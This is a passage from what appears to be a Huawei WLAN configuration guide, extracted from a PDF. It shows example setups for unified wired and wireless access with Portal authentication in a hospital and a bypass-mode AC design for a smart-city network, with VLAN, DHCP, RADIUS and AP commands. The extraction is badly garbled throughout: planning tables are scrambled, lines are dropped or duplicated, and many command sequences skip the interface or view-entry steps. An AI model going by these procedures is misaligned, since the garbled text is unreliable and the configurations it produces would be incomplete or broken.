interface Wlan-Ess1
#
ip route-static 0.0.0.0 0.0.0.0 10.11.10.1
#
wlan
ap-region id 10
region-id 10

forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
#
return
15.4 Example for Configuring Unified Access for Wired

and Wireless Users
Overview of Unified Access for Wired and Wireless Users

In real-world situations, both wired and wireless users need to access one network. For
example, the PCs and printers of a company connect to the network in wired mode, and
laptops and mobile phones wirelessly connect to the network. After the unified access for
wired and wireless users is configured on a network, the network allows access of both wired
and wireless users, and manages all the users in a unified manner.
Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an
appropriate security policy according to service requirements.


Configuration.

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN


are
Versi
on
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
A hospital needs to deploy a wired and a wireless network in the hospital building to meet
service requirements. To make management and maintenance easy, the administrator requires
that wired and wireless users be centrally managed on the AC, non-authentication and Portal
authentication be configured for the wired and wireless users respectively, and wireless users
roam under the same AC.
As shown in Figure 15-3, the AC connects to the egress gateway Router in the uplink
direction. In the downlink direction, the AC connects to and manages APs through S5700-1
and S5700-2 access switches. The S5700-1 and S5700-2 are deployed in the first and second
floors respectively. In each room, the AP2010DN is deployed to provide both wired and
wireless access. The AP5030DN is deployed in the corridor to provide wireless network
coverage. The S5700-1 and S5700-2 are PoE switches and directly provide power to
connected APs.
To facilitate network planning and management, the access switches are only used to
transparently transmit data at Layer 2, and all gateways are configured on the AC
The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs.

Figure 15-3 Networking diagram for configuring unified access for wired and wireless users
In te rn e t
R o u te r
G E 1 /0 /4 A g ile C o n tro lle r

G E 1 /0 /3
G E 1 /0 /1 G E 1 /0 /2
AC
G E 0 /0 /1 G E 0 /0 /1
S 5 7 0 0 -1 S 5 7 0 0 -2
G E 0 /0 /2 G E 0 /0 /4 G E 0 /0 /2 G E 0 /0 /4
G E 0 /0 /3 G E 0 /0 /3
A P101 A P102 A P103 A P201 A P202 A P203
Data Planning
Table 15-6 Network data planning

Item Interface VLAN Description
AC GE1/0/1 100, 201 Connected to the

S5700-1
GE1/0/2 100, 202 Connected to the

S5700-2
GE1/0/3 200 Connected to the

Agile Controller

egress gateway
S5700-1 GE0/0/1 100, 201 Connected to the AC
GE0/0/2 100, 201 Connected to AP101

AP101 and AP102 Eth0/0/0 201 GE0/0/0 connects to

Eth0/0/1 the S5700-1.
GE0/0/0 Eth0/0/0 and
Eth0/0/1 connects to
wired users.
AP101 and AP102
are AP2010DNs and
deployed in rooms
on the first floor to
provide wired and
wireless access.
AP103 - - AP103 is an
AP5030DN and
deployed in the
corridor on the first
floor to provide
wireless access.

Eth0/0/1 the S5700-2.
wired users.
AP201 and AP202
are AP2010DNs and
deployed in rooms
on the second floor
to provide wired and
wireless access.
AP203 - - AP203 is an
AP5030DN and
deployed in the
corridor on the
second floor to
provide wireless
access.
Table 15-7 Service data planning

IP address of the AC's 10.23.100.1/24 -

source interface
Country code CN -
WMM profile Name: wmm -

Radio profile Name: radio -
Security profile l Name: security -

l Security and
OPEN
Traffic profile Name: traffic -
Service set l Name: floor_1 Provides WLAN network

l SSID: hospital-wlan coverage for the first floor.
WLAN-ESS1
tunnel forwarding
l Name: floor_2 Provides WLAN network

l SSID: hospital-wlan coverage for the second
floor.
WLAN-ESS2
tunnel forwarding
DHCP server The AC functions as the -

DHCP server to allocate IP
addresses to APs, STAs, and
PCs.
AP gateway and IP address VLANIF100: -

pool range 10.23.100.1/24
10.23.100.2-10.23.100.254/
24
Gateway and IP address VLANIF101: -

pool range of the wireless 10.23.101.1/24
users 10.23.101.2-10.23.101.254/
24
VLANIF102: -
10.23.102.1/24
10.23.102.2-10.23.102.254/
24

pool range of the wired 10.23.201.1/24
users 10.23.201.2-10.23.201.254/
24

VLANIF202: -
10.23.202.1/24
10.23.202.2-10.23.202.254/
24
Server parameters Authentication server: l The Service Controller

Controller provides
l Port number: 1812 RADIUS server and
l RADIUS shared key: Portal server functions;
Admin@123 therefore, IP addresses of
the authentication server,
Accounting server: accounting server,
l IP address: 10.23.200.1 authorization server, and
l Port number: 1813 Portal server are all the
IP address of the SC.
Authorization server: collect user login and
l IP address: 10.23.200.1 logout information. The
port numbers of the
l RADIUS shared key: authentication server and
Admin@123 accounting server must
Portal server: be the same as those of
the RADIUS server.
l IP address: 10.23.200.1
l Configure an
l Port number that the AC authorization server to
uses to listen on Portal enable the RADIUS
protocol packets: 2000 server to deliver
l Destination port number authorization rules to the
in the packets that the AC. The shared key of
AC sends to the Portal the authorization server
server: 50200 must be the same as
those of the
l Portal shared key:
Admin@123
accounting server.
l Encryption key for the
URL parameters that the
AC sends to the Portal
server: Admin@123
Table 15-8 Radio channel data planning

AP101 Radio 0: channel 1 and Use the WLAN Planner to

power level 10 plan AP installation
locations, and the working
channel and power of the

AP102 Radio 0: channel 6 and AP radio. Set the channel

power level 10 mode and power mode to
fixed, and configure the
AP103 Radio 0: channel 11 and channel and power for each
power level 10 AP.
Radio 1: channel 153 and
power level 10
AP201 Radio 0: channel 1 and

power level 10

power level 10

power level 10
power level 10
1. Configure all network devices to enable the APs, S5700-1, S5700-2, and AC to
communicate with upper-layer devices.
2. Configure the AC as a DHCP server to assign IP addresses to APs, wired users, and
wireless users.
3. Configure a RADIUS server template, and configure authentication, accounting, and
authorization in the template, and configure Portal authentication.
4. Configure basic WLAN services, including AC system parameters, AP management, and
WLAN service parameters.
5. Configure VAPs and deliver VAP parameters to APs.
6. Verify the configuration to ensure that both wired and wireless users can access the
Internet.
Procedure
Step 1 Configure network devices to communicate with each other.
# Add interfaces GE0/0/1 to GE0/0/4 of the S5700-1 and S5700-2 to VLAN 100
(management VLAN), interfaces GE0/0/1 to GE0/0/4 of the S5700-1 to VLAN 201 (VLAN
for wired service packets), and interfaces GE0/0/1 to GE0/0/4 of the S5700-2 to VLAN 202
(VLAN for wireless service packets). Set PVIDs for interfaces directly connected to APs, and
you are also advised to configure port isolation on these interfaces to reduce broadcast
packets. The S5700-1 is used as an example here. The configuration on the S5700-2 is similar.
For details, see the configuration file of the S5700-2.
[HUAWEI] sysname S5700-1
[S5700-1] vlan batch 100 201
[S5700-1] interface gigabitethernet 0/0/1

[S5700-1-GigabitEthernet0/0/1] port link-type trunk

[S5700-1-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/1] quit
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 100 //Set a PVID for the
interface directly connected to the AP.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation
to reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/3] port trunk pvid vlan 100
[S5700-1-GigabitEthernet0/0/3] port-isolate enable
# On the AC, add GE1/0/1 connected to the S5700-1 to VLAN 100 and VLAN 201, GE1/0/2
connected to the S5700-2 to VLAN 100 and VLAN 202, GE1/0/4 connected to the upper-
layer network to VLAN 300, and GE1/0/3 connected to the Agile Controller to VLAN 200.
[HUAWEI] sysname AC
[AC] vlan batch 100 200 201 202 300
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 201
# Configure VLANIF 200 for communication between the AC and Agile Controller.
[AC] interface vlanif200
[AC-Vlanif200] ip address 10.23.200.2 24 //Configure an IP address for
communication between the AC and Agile Controller.
[AC-Vlanif200] quit
Step 2 Configure the AC as a DHCP server to assign IP addresses to PCs, APs, and STAs.
# Configure the AC to assign IP addresses to PCs, APs, and STAs from an interface address
pool.
[AC] dhcp enable
[AC] interface vlanif 100 //Configure an interface address pool to allocate IP
addresses to APs.
[AC-Vlanif100] description manage_ap
[AC-Vlanif100] quit
addresses to STAs on the first floor.

[AC-Vlanif101] description manage_floor1_sta

[AC-Vlanif101] quit
addresses to STAs on the second floor.
[AC-Vlanif102] quit
addresses to PCs on the first floor.
[AC-Vlanif201] description manage_floor1_pc
[AC-Vlanif201] quit
addresses to PCs on the second floor.
[AC-Vlanif202] quit
Step 3 Configure a RADIUS server template, and configure authentication, accounting, and
# Configure a RADIUS server template on the AC, and configure authentication, accounting,
and authorization in the template.
[AC] radius-server template radius1 //Create the RADIUS server template radius1
[AC-radius-radius1] radius-server authentication 10.23.200.1 1812 source ip-
address 10.23.200.2 weight 80 //Configure the RADIUS authentication server and
authentication port 1812. The AC uses the IP address 10.23.200.2 to communicate
with the RADIUS server.
[AC-radius-radius1] radius-server accounting 10.23.200.1 1813 source ip-address
10.23.200.2 weight 80 //Configure the RADIUS accounting server to collect user
login and logout information and set the accounting port number to 1813. The AC
uses the IP address 10.23.200.2 to communicate with the RADIUS server
[AC-radius-radius1] radius-server shared-key cipher Admin@123 //Configure the
shared key for the RADIUS server.
[AC-radius-radius1] undo radius-server user-name domain-included //The user
name that the device sends to the RADIUS server does not carry the domain name.
Configure the command when the RADIUS server does not accept the user name with
the domain name.
[AC-radius-radius1] quit
[AC] radius-server authorization 10.23.200.1 shared-key cipher Admin@123 //
Configure an IP address for the RADIUS authorization server, set the shared key
to Admin@123, same as the authentication and accounting keys. Configure the
authorization server so that the RADIUS server can deliver authorization rules to
the AC.
[AC] aaa
[AC-aaa] authentication-scheme radius1 //Create the authentication scheme
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Agile Controller
functions as the RADIUS server, the authentication mode must be set to RADIUS.
[AC-aaa-authen-radius1] quit
[AC-aaa] accounting-scheme radius1 //Create the accounting scheme radius 1.
[AC-aaa-accounting-radius1] accounting-mode radius //Set the accounting mode to
RADIUS. To facilitate account status information maintenance on the RADIUS
server, including the login and logout information, and forced logout
information, the accounting mode must be set to radius.
[AC-aaa-accounting-radius1] quit
[AC-aaa] domain portal1 //Create the domain portal1.
[AC-aaa-domain-portal1] authentication-scheme radius1 //Bind the authentication
scheme radius1.
[AC-aaa-domain-portal1] accounting-scheme radius1 //Bind the accounting scheme
radius1.
[AC-aaa-domain-portal1] radius-server radius1 //Bind the RADIUS server template
radius1.

[AC-aaa-domain-portal1] quit
[AC-aaa] quit
# Configure the Portal server.

[AC] web-auth-server portal1 //Create the Portal server template portal1.
[AC-web-auth-server-portal1] server-ip 10.23.200.1 //Configure an IP address for
the Portal server.
[AC-web-auth-server-portal1] port 50200 //Set the destination port number used
by the device to send packets to the Portal server to 50200 (default setting).
[AC-web-auth-server-portal1] shared-key cipher Admin@123 //Configure the shared
key for message exchange between the AC and Portal server.
[AC-web-auth-server-portal1] url http://10.23.200.1:8080/portal //Configure the
URL for a Portal server.
[AC-web-auth-server-portal1] quit
# Bind the Portal server template to the WLAN-ESS interface, enable Portal authentication
for wireless users, and configure non-authentication for wired users.
[AC-Wlan-Ess1] domain name portal1 force //Configure the forcible user domain
portal1.
[AC-Wlan-Ess1] domain name portal1 //Configure the default user domain portal1.
[AC-Wlan-Ess1] authentication portal //Configure Portal authentication.
[AC-Wlan-Ess1] web-auth-server portal1 direct //Bind the Portal server template
portal1 and specify Layer 2 authentication as the Portal authentication mode.
[AC-Wlan-Ess1] quit
[AC-Wlan-Ess2] domain name portal1 force //Configure the forcible user domain
portal1.
[AC-Wlan-Ess2] domain name portal1 //Configure the default user domain portal1.
[AC-Wlan-Ess2] authentication portal //Configure Portal authentication.
[AC-Wlan-Ess2] web-auth-server portal1 direct //Bind the Portal server template
portal1 and specify Layer 2 authentication as the Portal authentication mode.
[AC-Wlan-Ess2] quit

[AC] wlan ac-global country-code cn //Configure the AC country code. Radio
features of APs managed by the AC must conform to local laws and regulations. The
default country code is CN.
radio using the country code and reset the AP. If th
e new country code does not support the radio, all configurations of the radio
are cleared. Continue?[Y/N]:y

AC ID to 1.

[AC] wlan
Step 5 Manage the APs on the AC.

# Check the AP type IDs after obtaining the MAC addresses of the APs.
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN

23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
APs offline according to the obtained AP type IDs.
[AC-wlan-view] ap id 101 type-id 38 mac 60de-4476-e320 //Add the AP2010DN
offline with the MAC address 60de-4476-e320 and AP ID 101.
[AC-wlan-ap-101] quit
[AC-wlan-view] ap id 103 type-id 35 mac dcd2-fc04-b520 //Add the AP5030DN
offline with the MAC address dcd2-fc04-b520 and AP ID 103.
[AC-wlan-view] ap id 203 type-id 35 mac dcd2-fc04-b540 //Add the AP5030DN
offline with the MAC address dcd2-fc04-b540 and AP ID 203.
# Configure AP regions and add the APs to the AP regions.

[AC-wlan-view] ap-region id 1 //Create AP region1 and add APs on the first floor
to AP region1.
[AC-wlan-ap-region-1] ap-region-name floor1 //Name the AP region1 floor1.
[AC-wlan-ap-101] region-id 1 //Add AP 101 to AP region1.
[AC-wlan-ap-102] region-id 1
[AC-wlan-view] ap-region id 2 //Create AP region2 and add APs on the second
floor to AP region2.
[AC-wlan-ap-region-2] ap-region-name floor2

# Power on the APs and run the display ap all command to check the AP running status. If
the AP State field displays as normal, the APs are online on the AC.
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
101 AP2010DN 60de-4476-e320 0/1 normal ap-101
103 AP5030DN dcd2-fc04-b520 0/1 normal ap-103
203 AP5030DN dcd2-fc04-b540 0/2 normal ap-203
------------------------------------------------------------------------------
# Configure the AP2010DN's uplink interface GE0/0/0 and downlink interfaces Eth0/0/0 and
Eth0/0/1 to allow wired service packets to pass through.
[AC-wlan-ap-101] lineate-port ethernet 0 pvid vlan 201 //The downlink interface
of the AP2010DN is used to connect wired terminals, such as the PCs. Set a PVID
for the interface. VLAN 201 is used to transmit wired service packets of the
first floor.
[AC-wlan-ap-101] lineate-port ethernet 0 vlan untagged 201 //The downlink
interface of the AP2010DN is used to connect wired terminals. Add the interface
to VLAN 201 in untagged mode.
[AC-wlan-ap-101] lineate-port ethernet 1 pvid vlan 201
[AC-wlan-ap-101] lineate-port ethernet 1 vlan untagged 201
[AC-wlan-ap-101] lineate-port gigabitethernet 0 vlan tagged 201 //The uplink
interface of the AP2010DN is used to connect to the upper-layer devices. Add the
interface to VLAN 201 in tagged mode.
[AC-wlan-ap-102] lineate-port gigabitethernet 0 vlan tagged 201
[AC-wlan-ap-201] lineate-port ethernet 0 pvid vlan 202 //The downlink interface
of the AP2010DN is used to connect wired terminals, such as the PCs. Set a PVID
for the interface. VLAN 202 is used to transmit wired service packets of the
second floor.

# Create the WMM profile wmm.


# Create the radio profile radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-radio-prof-radio] power-mode fixed //Set the power mode of the radio to
fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode of the
radio to fixed.
[AC-wlan-view] quit
# Create WLAN-ESS interface 1 and WLAN-ESS interface 2.

[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102 //Configure the wlan-ess
interface to allow packets from wireless service VLANs to pass through, which is
one of the prerequisites for intra-AC roaming.
[AC-Wlan-Ess1] quit
[AC-Wlan-Ess2] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess2] quit
# Create the security profile security.

[AC] wlan
[AC-wlan-view] security-profile name security id 1 //Portal authentication has
been enabled on the interface. Set the security policy to OPEN (default setting),
that is, no authentication and no encryption.
# Create the traffic profile traffic.

# Create service sets floor1 and floor2, and bind the service VLANs, WLAN-ESS interfaces,
security profile, and traffic profile to the service sets. Set the forwarding mode to tunnel
forwarding.
[AC-wlan-view] service-set name floor1 id 1 //Create the service set floor1.
[AC-wlan-service-set-floor1] ssid hospital-wlan //Set the SSID to hospital-wlan.
[AC-wlan-service-set-floor1] wlan-ess 1 //Bind the WLAN-ESS interface.
[AC-wlan-service-set-floor1] security-profile name security //Bind the security
profile security.
[AC-wlan-service-set-floor1] traffic-profile name traffic //Bind the traffic
profile traffic.
[AC-wlan-service-set-floor1] service-vlan 101 //Bind the service VLAN 101.
[AC-wlan-service-set-floor1] forward-mode tunnel //Set the forwarding mode to
tunnel forwarding. The default forwarding mode is direct forwarding.
[AC-wlan-service-set-floor1] user-isolate //Configure Layer 2 isolation for
users connected to the same VAP.
[AC-wlan-service-set-floor1] quit
[AC-wlan-view] service-set name floor2 id 2
[AC-wlan-service-set-floor2] ssid hospital-wlan //Set the SSID to hospital-wlan.
All service sets must be configured with the same SSID, which is one of the
prerequisites for intra-AC roaming.
[AC-wlan-service-set-floor2] wlan-ess 2
[AC-wlan-service-set-floor2] security-profile name security //Bind the security
profile security. All service sets must have the same security profile bound,
which is one of the prerequisites for intra-AC roaming.
[AC-wlan-service-set-floor2] traffic-profile name traffic
[AC-wlan-service-set-floor2] service-vlan 102
[AC-wlan-service-set-floor2] forward-mode tunnel
[AC-wlan-service-set-floor2] user-isolate
[AC-wlan-service-set-floor2] quit

Step 7 Configure VAPs and deliver VAP parameters to the APs.

# Configure VAPs.
[AC-wlan-view] ap 101 radio 0 //Configure radio0 of the AP2010DN.
[AC-wlan-radio-101/0] radio-profile name radio //Bind the radio profile to the
radio.
[AC-wlan-radio-101/0] service-set name floor1 //Bind the service set to the
radio. A VAP is generated after the binding.
[AC-wlan-radio-101/0] channel 20mhz 1 //Configure the channel based on the
planning result of the WLAN Planner.
[AC-wlan-radio-101/0] power-level 10 //Configure the power based on the planning
result of the WLAN Planner.
[AC-wlan-radio-102/0] radio-profile name radio
[AC-wlan-radio-102/0] service-set name floor1
[AC-wlan-radio-102/0] channel 20mhz 6
[AC-wlan-radio-102/0] power-level 10
[AC-wlan-view] ap 103 radio 1 //The AP5030 supports two radios. This step
configures radio 1.
# Deliver the configuration to the APs.

[AC-wlan-view] commit all //After the WLAN service configuration is complete on
the AC, the configuration takes effect after you deliver it to the APs.
:y

# After the configuration is complete, run the display vap all command. The command output
shows that VAPs have been created.

[AC-wlan-view] display vap all

----------------------------------------------------------------------
----------------------------------------------------------------------
101 0 1 - - 1 60de-4476-e320 service
102 0 1 - - 1 60de-4476-e340 service
103 0 1 - - 1 dcd2-fc04-b520 service
103 1 1 - - 1 dcd2-fc04-b530 service
201 0 2 - - 1 60de-4476-e360 service
202 0 2 - - 1 60de-4476-e380 service
203 0 2 - - 1 dcd2-fc04-b540 service
203 1 2 - - 1 dcd2-fc04-b550 service
----------------------------------------------------------------------
Total: 8
# STAs discover the WLAN with the SSID hospital-wlan and associate with the WLAN. The
STAs are allocated IP addresses. After you enter the key, the STAs can access the wireless
network. Run the display station assoc-info command on the AC. The command output
shows that the STAs have connected to the WLAN hospital-wlan.
[AC-wlan-view] display station assoc-info all
AP/Rf/WLAN: AP ID/Radio ID/WLAN ID
------------------------------------------------------------------------------
STA MAC AP/Rf/WLAN Rx/Tx Mode RSSI IP address
SSID
------------------------------------------------------------------------------
e019-1dc7-1e08 101/0/1 6/11 11n -89 10.23.101.254
hospital-wlan
------------------------------------------------------------------------------
Total stations: 1
# STAs and PCs obtain IP addresses and connect to the network normally.
----End
Configuration Files
l Configuration file of the S5700-1 connected to wired users
#
sysname S5700-1
#
vlan batch 100 201
#
#
#
#

#
return
l Configuration file of the S5700-2 connected to wireless users
#
sysname S5700-2
#
vlan batch 100 202
#
#
#
#
#
return
#
sysname AC
#
vlan batch 100 to 102 200 to 202 300
#
#
dhcp enable
#
radius-server template radius1
radius-server shared-key cipher %#%#ut)92(w\&0@UJ}J7}^3Z9x`9~Y$`2D1AGwDQ[+S.
%#%#
weight 80
weight 80
undo radius-server user-name domain-included
radius-server authorization 10.23.200.1 shared-key cipher %#
%#[m1~SG]5CAzg~K35!b^Wa';{=+k_40Q\YK~}UX6T%#%#
#
web-auth-server portal1
server-ip 10.23.200.1
port 50200
shared-key cipher %#%#^B],0yW|oJ1;j:U&`%}(=@2t*]e.$TOVrx@(I6rT%#%#
url http://10.23.200.1:8080/portal
#
aaa
authentication-scheme radius1
accounting-scheme radius1
domain portal1
radius-server radius1
#

interface Vlanif100
description manage_ap
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
description manage_floor1_sta
ip address 10.23.101.1 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
#
interface Vlanif200
ip address 10.23.200.2 255.255.255.0
#
interface Vlanif201
description manage_floor1_pc
ip address 10.23.201.1 255.255.255.0
#
interface Vlanif202
ip address 10.23.202.1 255.255.255.0
#
#
#
#
#
interface Wlan-Ess1
domain name portal1 force
domain name portal1
web-auth-server portal1 direct
#
interface Wlan-Ess2
domain name portal1
#
#
wlan
ap-region id 1
ap-region-name floor1
ap-region id 2
ap-region-name floor2
ap id 101 type-id 38 mac 60de-4476-e320
region-id 1
lineate-port ethernet 0 pvid vlan 201
lineate-port ethernet 0 vlan untagged 201


lineate-port gigabitethernet 0 vlan tagged 201
region-id 1
ap id 103 type-id 35 mac dcd2-fc04-b520
region-id 1
region-id 2
region-id 2
ap id 203 type-id 35 mac dcd2-fc04-b540
region-id 2
service-set name floor1 id 1
forward-mode tunnel
wlan-ess 1
ssid hospital-wlan
user-isolate
service-vlan 101
service-set name floor2 id 2
forward-mode tunnel
wlan-ess 2
ssid hospital-wlan
user-isolate
service-vlan 102
channel-mode fixed
power-mode fixed
wmm-profile id 1
ap 101 radio 0
radio-profile id 1
power-level 10
ap 102 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
ap 103 radio 0
radio-profile id 1
channel 20MHz 11
power-level 10
ap 103 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10

ap 201 radio 0
radio-profile id 1
power-level 10
ap 202 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
ap 203 radio 0
radio-profile id 1
channel 20MHz 11
power-level 10
ap 203 radio 1
radio-profile id 1
channel 20MHz 157
power-level 10
#
return
15.5 Example for Configuring WLAN Services for a

Wireless City Project (AC Bypass Deployment, Portal
Authentication)
WLAN Service Overview

You can configure WLAN services to allow wireless users to easily access a wireless network
and move around within the coverage area of the wireless network.
Configuration Notes


Configuration.

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN


are
Versi
on
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
A city needs to deploy the wireless smart city project and requires that Portal authentication
be used for wireless users in the coverage area of the wireless network. Since a large number
of wireless users exist, high wireless service performance and Portal authentication
performance are required.
As shown in Figure 15-4, the S9700 core switch functions as the gateway for STAs and APs
and as the DHCP server to assign IP addresses to STAs and APs. The S9700 connects to APs
through PoE access switches S5700-1 and S5700-2. The AC and APs are located on a Layer 3
network. The AC is the X series card on the S9700 and connected to the S9700 through Eth-
Trunk in bypass mode.
transparently transmit data at Layer 2.

Figure 15-4 Networking diagram for configuring WLAN services for a wireless city project
In te rn e t
R o u te r
C o n tro lle r
AC
G E 2 /0 /1 G E 1 /0 /4
G E 1 /0 /5 G E 1 /0 /3
G E 1 /0 /6 G E 1 /0 /2
G E 2 /0 /2 G E 1 /0 /1
S9700
G E 0 /0 /1 G E 0 /0 /1
S 5 7 0 0 -1 S 5 7 0 0 -2
G E 0 /0 /2 G E 0 /0 /3 G E 0 /0 /2 G E 0 /0 /3
AP101 AP102 AP201 AP202
Data Planning

AC Eth-Trunk1 100 Configured to

improve network
bandwidth and
reliability
Add GE2/0/1 and
GE2/0/2 to Eth-
Trunk 1 and connect
the two interfaces to
the S9700.
S9700 GE1/0/1 10, 101 Connected to the

S5700-1

S5700-2


Controller

upper-layer network
Eth-Trunk1 100 Configured to

improve network
bandwidth and
reliability
Add GE1/0/5 and
GE1/0/6 to Eth-
Trunk 1 and connect
the AC.


source interface
Country code CN -
WMM profile Name: wmm -
Radio profile Name: radio -
Security profile l Name: security -

l Security and
OPEN
Traffic profile Name: traffic -
Service set l Name: area_1 Provides WLAN network

l SSID: city-wlan coverage for Area1.
WLAN-ESS1
l Service data forwarding
mode: direct forwarding
l Name: area_2 Provides WLAN network

WLAN-ESS2

DHCP server The S9700 functions as the -

AP gateway and IP address VLANIF10: 10.23.10.1/24 Gateway and IP address

pool range 10.23.10.2-10.23.10.254/24 pool for AP101 and AP102
VLANIF20: 10.23.20.1/24 Gateway and IP address

10.23.20.2-10.23.20.254/24 pool for AP201 and AP202
STA gateway and IP address VLANIF101: -

pool range 10.23.101.1/24
10.23.101.2-10.23.101.254/
24
VLANIF102: -
10.23.102.1/24
10.23.102.2-10.23.102.254/
24
Server parameters Authentication server: l Three Service

l Active IP address: Controllers (SCs) are
10.23.30.1 deployed on the network.
Controller1 and
l Active IP address: Controller2 are used for
10.23.30.2 load balancing, and
l Standby IP address: Controller3 serves as a
10.23.30.3 backup for Controller1
l Port number: 1812 and Controller2.
l RADIUS shared key: l The Service Controller
Admin@123 (SC) of the Agile
Controller provides
Accounting server: RADIUS server and
l Active IP address: Portal server functions;
10.23.30.1 therefore, IP addresses of
l Active IP address: accounting server,
10.23.30.2 authorization server, and
l Standby IP address: Portal server are all the
10.23.30.3 IP address of the SC.
l Port number: 1813 l Configure a RADIUS
collect user login and
Admin@123
logout information. The
port numbers of the
be the same as those of
the RADIUS server.

Authorization server: l Configure an

l Active IP address: authorization server to
10.23.30.1 enable the RADIUS
server to deliver
l Active IP address: authorization rules to the
10.23.30.2 AC. The shared key of
l Standby IP address: the authorization server
10.23.30.3 must be the same as
l RADIUS shared key: those of the
Admin@123 authentication server and
accounting server.
Portal server:
l Active IP address:
10.23.30.1
10.23.30.2
l Standby IP address:
10.23.30.3
l Port number that the AC
uses to listen on Portal
protocol packets: 2000
l Destination port number
in the packets that the
server: 50100
Admin@123
server: Admin@123


Radio 1: channel 153 and locations, and the working
power level 10 channel and power of the
AP radio. Set the channel
AP102 Radio 0: channel 6 and mode and power mode to
power level 10 fixed, and configure the
Radio 1: channel 161 and channel and power for each
power level 10 AP.


power level 10
power level 10

power level 10
power level 10
1. Configure all network devices to enable the APs, S5700-1, S5700-2, S9700, and AC to
2. Configure the AC as a DHCP server to assign IP addresses to the STAs and APs.
Internet.
Procedure
# Add interfaces GE0/0/1 to GE0/0/3 of the S5700-1 to VLAN 10 (management VLAN) and
VLAN 101 (service VLAN). Set PVIDs for interfaces directly connected to APs, and you are
also advised to configure port isolation on these interfaces to reduce broadcast packets.
[S5700-1] vlan batch 10 101
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to
reduce broadcast packets.

[S5700-2] vlan batch 20 102
# On the S9700, add GE1/0/1 connected to the S5700-1 to VLAN 10 and VLAN 101,
GE1/0/2 connected to the S5700-2 to VLAN 20 and VLAN 102, GE1/0/3 connected to the
Controller to VLAN 300, GE1/0/4 connected to the upper-layer network to VLAN 101 and
VLAN 102, and GE1/0/5 and GE1/0/6 connected to the AC to Eth-Trunk 1. Add Eth-Trunk 1
to VLAN 100.
[HUAWEI] sysname S9700
[S9700] vlan batch 10 20 100 101 102 300
[S9700] interface gigabitethernet 1/0/1
[S9700-GigabitEthernet1/0/1] port link-type trunk
[S9700-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 101
[S9700-GigabitEthernet1/0/1] quit
[S9700-GigabitEthernet1/0/3] port trunk allow-pass vlan 300
[S9700] interface eth-trunk 1
[S9700-Eth-Trunk1] port link-type trunk
[S9700-Eth-Trunk1] port trunk allow-pass vlan 100
[S9700-Eth-Trunk1] trunkport gigabitethernet 1/0/5 1/0/6 //Add GE1/0/5 and
[S9700-Eth-Trunk1] quit
# On the S9700, configure VLANIF 100 for communication with the AC and VLANIF 300
for communication with the Controller.
[S9700] interface vlanif100
[S9700-Vlanif100] ip address 10.23.100.10 24 //Configure an IP address for
communication between the S9700 and AC.
[S9700-Vlanif100] quit
communication between the S9700 and Controller.

# On the AC, add GE2/0/1 and GE2/0/2 connected to the S9700 to Eth-Trunk 1 and add Eth-
Trunk 1 to VLAN 100.
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface eth-trunk 1
[AC-Eth-Trunk1] port link-type trunk
[AC-Eth-Trunk1] port trunk allow-pass vlan 100
[AC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 2/0/2 //Add GE2/0/1 and GE2/0/2
to Eth-Trunk1.
[AC-Eth-Trunk1] quit
# Configure VLANIF 100 on the AC for communication with the S9700.

[AC-Vlanif100] quit
Step 2 Configure the S9700 as a DHCP server to assign IP addresses to APs and STAs.
# Configure the S9700 to assign IP addresses to the STAs and APs from the global address
pool.
[S9700] dhcp enable
[S9700] interface vlanif 10 //Configure a global address pool to assign IP
addresses to AP101 and AP102.
[S9700-Vlanif10] description manage_ap1
[S9700-Vlanif10] ip address 10.23.10.1 24
[S9700-Vlanif10] dhcp select global
[S9700] ip pool manage_ap1
[S9700-ip-pool-manage_ap1] gateway-list 10.23.10.1
[S9700-ip-pool-manage_ap1] network 10.23.10.0 mask 255.255.255.0
[S9700-ip-pool-manage_ap1] option 43 sub-option 3 ip-address 10.23.100.1 //Since
a Layer 3 network is deployed between the AC and APs, configure Option43 to
advertise the AC's IP address to APs.
[S9700-ip-pool-manage_ap1] quit
advertise the AC¡¯s IP address to the APs.
[S9700] interface vlanif 101 //Configure a global IP address pool to assign IP
addresses to STAs connected to AP101 and AP102.
[S9700-Vlanif101] description manage_area1_sta
